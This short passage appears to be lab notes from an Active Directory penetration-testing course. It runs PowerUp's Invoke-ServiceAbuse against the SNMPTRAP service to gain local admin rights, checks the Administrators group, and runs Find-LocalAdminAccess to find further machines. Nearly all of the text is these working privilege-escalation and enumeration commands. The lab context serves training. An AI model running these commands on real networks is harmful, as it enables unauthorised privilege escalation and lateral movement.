
Exploit a service and gain local admin privileges
Invoke-ServiceAbuse -Name 'SNMPTRAP' -UserName "dcorp\\student422"

now let’s check if we now have local admin access or not
net localgroup Administrators

Yeah we defiantly have it!
Getting machine where our user have local admin access
Find-LocalAdminAccess -Verbose

